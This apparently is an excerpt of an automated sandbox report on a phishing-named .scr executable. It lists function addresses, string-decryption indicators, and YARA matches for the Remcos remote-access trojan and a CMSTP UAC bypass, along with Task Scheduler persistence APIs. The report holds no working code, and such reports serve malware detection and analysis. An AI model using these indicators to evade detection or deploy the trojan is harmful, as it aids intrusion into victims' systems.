Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0042707E	3_2_0042707E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041301D	3_2_0041301D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00441030	3_2_00441030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00453110	3_2_00453110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004271B8	3_2_004271B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041D27C	3_2_0041D27C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004522E2	3_2_004522E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043D2A8	3_2_0043D2A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00437360	3_2_00437360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004363BA	3_2_004363BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0042645F	3_2_0042645F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00431582	3_2_00431582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043672C	3_2_0043672C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041E7EA	3_2_0041E7EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0044C949	3_2_0044C949
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004269D6	3_2_004269D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004369D6	3_2_004369D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043CBED	3_2_0043CBED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00432C54	3_2_00432C54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00436C9D	3_2_00436C9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043CE1C	3_2_0043CE1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00436F58	3_2_00436F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00434F32	3_2_00434F32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10017194	3_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_1000B5C1	3_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044A030	6_2_0044A030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0040612B	6_2_0040612B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0043E13D	6_2_0043E13D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044B188	6_2_0044B188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00442273	6_2_00442273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044D380	6_2_0044D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044A5F0	6_2_0044A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_004125F6	6_2_004125F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_004065BF	6_2_004065BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_004086CB	6_2_004086CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_004066BC	6_2_004066BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044D760	6_2_0044D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00405A40	6_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00449A40	6_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00405AB1	6_2_00405AB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00405B22	6_2_00405B22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044ABC0	6_2_0044ABC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00405BB3	6_2_00405BB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00417C60	6_2_00417C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044CC70	6_2_0044CC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00418CC9	6_2_00418CC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044CDFB	6_2_0044CDFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044CDA0	6_2_0044CDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044AE20	6_2_0044AE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00415E3E	6_2_00415E3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00437F3B	6_2_00437F3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00405038	8_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0041208C	8_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004050A9	8_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0040511A	8_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0043C13A	8_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004051AB	8_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00449300	8_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0040D322	8_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0044A4F0	8_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0043A5AB	8_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00413631	8_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00446690	8_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0044A730	8_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004398D8	8_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004498E0	8_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0044A886	8_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0043DA09	8_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00438D5E	8_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00449ED0	8_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0041FE83	8_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00430F54	8_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004050C2	9_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004014AB	9_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00405133	9_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004051A4	9_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00401246	9_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0040CA46	9_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00405235	9_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004032C8	9_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00401689	9_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00402F60	9_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00433AB0 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004341C0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004020E7 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00413025 appears 79 times

Sample file is different than original file name gathered from version info

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1475256438.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1509465000.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHhlnacha.dll" vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000000.1295184318.00000000008B6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQryevpwgo.exe4 vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1515224876.0000000006780000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000004095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Binary or memory string: OriginalFilenameQryevpwgo.exe4 vs OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Uses 32bit PE files

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40957c0.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.40457a0.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@14/7@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

